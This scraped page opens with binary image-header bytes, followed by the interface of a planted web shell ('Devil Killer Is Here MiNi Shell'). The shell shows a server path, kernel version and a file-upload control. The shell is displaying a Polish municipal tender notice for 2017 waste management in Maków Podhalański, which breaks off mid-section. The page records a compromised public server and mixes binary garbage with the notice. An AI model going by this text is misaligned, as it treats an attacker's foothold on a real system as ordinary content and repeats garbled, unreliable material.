JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161109/339993-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.makow-podhalanski.pl' target='_blank'>www.makow-podhalanski.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 339993 - 2016
              z dnia 2016-11-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Maków Podhalański: Zagospodarowanie odpadów komunalnych z terenu Gminy Maków Podhalański w 2017 roku.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>nie dotyczy<br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b>nie tylko<br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Maków Podhalański, krajowy numer identyfikacyjny
              55215849630000, ul.
              ul. Szpitalna 
              3,
              34220  
              Maków Podhalański, woj.
              małopolskie, państwo
              Polska, tel.
              33 874 97 00, e-mail
              , faks
              33 874 97 51.
              <br />
              Adres strony internetowej (URL): www.makow-podhalanski.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.makow-podhalanski.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.makow-podhalanski.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Na podstawie art. 10c pkt. 1 Ustawy Prawo Zamówień Publicznych Zamawiający odstępuje od wymogu użycia środków komunikacji elektronicznej przy składaniu ofert, składanie ofert odbywać się będzie za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. (Dz.U. poz. 1529 oraz z 2015r. poz. 1830)  Prawo pocztowe, osobiście lub za pośrednictwem posłańca.<br />
                Adres:
                <br />Oferty należy składać w siedzibie Urzędu Miejskiego w Makowie Podhalańskim Biuro Obsługi Klienta  parter budynku, nie później niż do dnia: 17.11.2016 r. do godz. 9:00.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zagospodarowanie odpadów komunalnych z terenu Gminy Maków Podhalański w 2017 roku.<br /><b>Numer referencyjny: </b>GK.271.1.14.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />Część 1, Część 2 i Część 3<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przyjęcie i zagospodarowanie zebranych odpadów komunalnych zmieszanych, selektywnie zebranych odpadów komunalnych, odpadów wielkogabarytowych, odpadów zielonych i innych bioodpadów, pochodzących z terenu Gminy Maków Podhalański należącej zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 r. z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego §14 do obszaru Regionu Południowego województwa małopolskiego. 
Zebrane odpady powinny trafić bezpośrednio do regionalnych instalacji a w przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, do instalacji odzysku i unieszkodliwiania odpadów, spełniającą wymagania określone w przepisach szczegółowych, tj. Ustawa z dnia 14 grudnia 2012 r. o odpadach oraz ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach., przekazanych Wykonawcy zadania po wstępnej ich analizie przez Zamawiającego za pośrednictwem wyłonionego w innej procedurze przetargowej prowadzonej przez Zamawiającego odbiorcy odpadów komunalnych od nieruchomości mieszkańców z terenu Gminy Maków Podhalański, zarówno zmieszanych odpadów komunalnych jak również odpadów gromadzonych w sposób selektywny w szczególności: papier, metal, tworzywa sztuczne, szkło, opakowania wielomateriałowe oraz odpady komunalne ulegające biodegradacji w tym opakowania ulegające biodegradacji i odpady zielone oraz inne odpady wytworzone w nieruchomości.
Orientacyjna ilość odpadów komunalnych, którą Zamawiający przewiduje odebrać od mieszkańców Gminy Maków Podhalański w okresie obowiązywania umowy z Wykonawcą odbierającym dostarczone odpady wyniesie około 3 165,00 MG.
2.Szacunkowa ilość odpadów w rozbiciu na poszczególne frakcje sporządzona została na podstawie własnych analiz opartych o dotychczasową sprawozdawczość oraz własne założenia:
Odpad niesegregowany - zmieszany - 2600,00 MG
Papier,Szkło,Tworzywa sztuczne,Opakowania wielomateriałowe,Metale -400,0 MG
Odpady ulegające biodegradacji- 20,00 MG
Wielkogabarytowe - 145,00 MG
SUMA = 3165,00 MG
Zamawiający nie gwarantuje ww. ilości odpadów w czasie obowiązywania umowy.
3.Wyżej wymienione frakcje odpadów zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 r. z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego oraz Ustawą z dnia 13 września 1996 o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r. z późn.zm.) Art. 9e powinny trafić bezpośrednio do regionalnych instalacji a w przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, do instalacji odzysku i unieszkodliwiania odpadów, spełniającą wymagania określone w przepisach szczegółowych, tj. Ustawa z dnia 14 grudnia 2012 r. o odpadach oraz ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach.
4.Zamawiający przed dostarczeniem odpadów segregowanych do Wykonawcy zadania dokona oceny stopnia wyselekcjonowania odpadów komunalnych zebranych od mieszkańców z terenu Gminy Maków Podhalański. Stopień dokonanej selekcji nie będzie podlegać kwestionowaniu przez Wykonawcę.
5.Dostawa odpadów komunalnych odbywać się będzie samochodami własnymi Wykonawcy, z którym Gmina Maków Podhalański posiada aktualną umowę na odbiór odpadów komunalnych pochodzących z terenu Gminy Maków Podhalański.
6.Wykonawca zobowiązany będzie do przekazywania raportów miesięcznych Zamawiającemu zawierających informacje o ilości odebranych odpadów z podziałem na poszczególne frakcje w danym miesiącu w Mg.<br /><br /><b>II.5) Główny kod CPV: </b>90500000-2<br /><b> Dodatkowe kody CPV:</b>90533000-2,
                90514000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w Art. 67 ust. 1 pkt. 6 Ustawy Prawo zamówień publicznych.
Zamawiający przewiduje udzielenia zamówień uzupełniających o łącznej wartości do 10% zamówienia podstawowego. Zamówienia uzupełniające polegać będzie na powtórzeniu tego samego rodzaju usług jakie obejmuje zamówienie podstawowe.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający na podstawie art. 29 ust. 3a Ustawy Prawo Zamówień Publicznych wymaga, zatrudnienia przez Wykonawcę lub podwykonawcę, na podstawie umowy o pracę, osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy (Dz. U. z 2014 r. poz. 1502 z późn.zm.), zgodnie z oświadczeniem złożonym w ofercie.
1. Wykonawca w przypadku uznania jego oferty za najkorzystniejszą, zobowiązany jest do posiadania zatrudnienia na czas realizacji zamówienia: 
a). dla CZĘŚCI NR 1  co najmniej 8 osób, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
b). dla CZĘŚCI NR 2  co najmniej 3 osoby, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
c). dla CZĘŚCI NR 3  co najmniej 3 osoby, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
Wykonawca składający ofertę łączną dla wszystkich CZĘŚCI dla spełnienia warunków udziału w prowadzonym postępowaniu powinien spełnić wymagania jak dla CZĘŚCI 1.
2. W celu zweryfikowania wypełnienia przez Wykonawcę wymogu zatrudnienia osób na podstawie umowy o pracę, Wykonawca w terminie 5 dni roboczych od zawarcia umowy przedłoży Zamawiającemu wykaz osób, które będą uczestniczyć w wykonywaniu w/w robót po stronie Wykonawcy lub Podwykonawcy, ze wskazaniem czynności, jakie będą oni wykonywać. 
W przypadku konieczności zmiany osób wykonujących czynności w ramach przedmiotu umowy w okresie trwania zamówienia, Wykonawca w terminie 5 dni roboczych od dokonania przedmiotowej zmiany, zobowiązany jest do przekazania nowego wykazu osób zatrudnionych na podstawie umowy o pracę wraz ze wskazaniem czynności jakie będą oni wykonywać.
3. Zamawiający uprawniony będzie do kontroli spełnienia przez Wykonawcę wymagań
dotyczących zatrudnienia ww. osób na każdym etapie realizacji umowy, poprzez żądanie od Wykonawcy lub Podwykonawcy dostarczenia dowodów potwierdzających zatrudnienie osób wykonujących czynności związane z realizacją usługi, w tym w szczególności:
a). kopii umów o pracę lub
b). kopii dokumentów potwierdzających podleganie ubezpieczeniom społecznym z tytułu zatrudnienia na podstawie umowy o pracę lub,
c). innych dokumentów potwierdzających zawarcie umowy o pracę
Wykonawca przekaże wskazane przez Zamawiającego dokumenty niezwłocznie, wraz z uzyskanym od tych osób pisemnej zgody na przetwarzanie danych osobowych zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2015 r. poz. 2135).
4. Nieprzedłożenie przez Wykonawcę w/w dowodów uznane będzie przez Zamawiającego za niewypełnienie obowiązku zatrudnienia osób na podstawie umowy o pracę oraz obciążeniem Wykonawcę przez Zamawiającego karami umownymi zgodnie z zapisami zawartymi w projekcie umowy (zał. nr 5 do SIWZ).</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający uzna warunek za spełniony, jeżeli Wykonawca biorący udział w postępowaniu złoży oświadczenia (wg. Załącznika nr 2 do SIWZ).<br />
                Informacje dodatkowe
                (Załącznik nr 2 do SIWZ)<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                W celu potwierdzenia spełnienia tego warunku Zamawiający wymaga kopii opłaconej polisy ubezpieczeniowej a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 500 000,00 złotych.<br />
                Informacje dodatkowe
                kopia polisy<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                -W celu potwierdzenia spełnienia tego warunku Zamawiający wymaga:
Dla CZĘŚCI 1  Wykonawca biorący udział w prowadzonym postępowaniu powinien posiadać status regionalnej instalacji do przetwarzania zmieszanych odpadów komunalnych, zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 roku z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.
Dla CZĘŚCI 2  Wykonawca biorący udział w prowadzonym postępowaniu powinien posiadać status regionalnej instalacji do przetwarzania selektywnie zebranych odpadów zielonych i innych bioodpadów, zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 roku z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.
Dla CZĘŚCI 3  Wykonawca biorący udział w prowadzonym postępowaniu powinien wykazać, że dysponuje instalacją odzysku i unieszkodliwiania odpadów, spełniającą wymagania określone w przepisach szczegółowych, tj. Ustawy z dnia 14 grudnia 2012 r. o odpadach oraz Ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach.
-W celu potwierdzenia spełnienia tego warunku Zamawiający zgodnie z Art. 29 ust. 3a, wymaga złożenia przez Wykonawcę biorącego udział w prowadzonym postępowaniu wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego zatrudnionych przez Wykonawcę lub Podwykonawcę na umowę o pracę, w sposób określony w Art. 22 § 1 ustawy z 26 czerwca 1974 r.  Kodeks pracy (Dz. U. z 2014 r. poz. 1502 z późn.zm.), w szczególności osób odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia zawodowego niezbędnego do wykonania zamówienia a także zakresu wykonywanych przez nich czynności:
a). dla CZĘŚCI NR 1  co najmniej 8 osób, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
b). dla CZĘŚCI NR 2  co najmniej 3 osoby, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
c). dla CZĘŚCI NR 3  co najmniej 3 osoby, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
Wykonawca składający ofertę łączną dla wszystkich CZĘŚCI  dla spełnienia warunków udziału w prowadzonym postępowaniu powinien spełnić wymagania dla CZĘŚCI 1 (wg Załącznika nr 3 do SIWZ).
Wykonawca składający ofertę łączną dla CZĘŚCI 1, CZĘŚCI 2 i CZĘŚCI 3 dla spełnienia warunków udziału w prowadzonym postępowaniu powinien spełnić wymagania jak dla CZĘŚCI 1.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Wykonawca w przypadku uznania jego oferty za najkorzystniejszą, zobowiązany jest do posiadania zatrudnienia na czas realizacji zamówienia: 
a). dla CZĘŚCI NR 1  co najmniej 8 osób, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
b). dla CZĘŚCI NR 2  co najmniej 3 osoby, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
c). dla CZĘŚCI NR 3  co najmniej 3 osoby, w wymiarze pełnego wymiaru czasu pracy (pełny etat) wykonujących prace fizyczne związane z wykonywaniem zamówienia;
Wykonawca składający ofertę łączną dla wszystkich CZĘŚCI dla spełnienia warunków udziału w prowadzonym postępowaniu powinien spełnić wymagania jak dla CZĘŚCI 1.
wg Załącznika nr 3 do SIWZ</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Zamawiający uzna warunek za spełniony, jeżeli Wykonawca biorący udział w postępowaniu złoży oświadczenia (wg. Załącznika nr 2 do SIWZ).
2.Wykonawca który powołuje się na zasoby innych podmiotów, w celu wykazania braku wobec nich podstaw do wykluczenia oraz spełnienia, w zakresie w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, składa także odrębne Oświadczenia dla każdego z tych podmiotów (Załącznik nr 2 do SIWZ).
3.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie (Załącznik nr 2 do SIWZ).
4.W terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji, o której mowa w Art. 86 ust 5, Wykonawca przekazuje Zamawiającemu Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2015 r. poz. 184 z późn. zm.). Wraz ze złożeniem oświadczenia Wykonawca może przedstawić dowody potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia uczciwej konkurencji w postępowaniu. Oświadczenie należy złożyć (Załącznik nr 4 do SIWZ).     
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
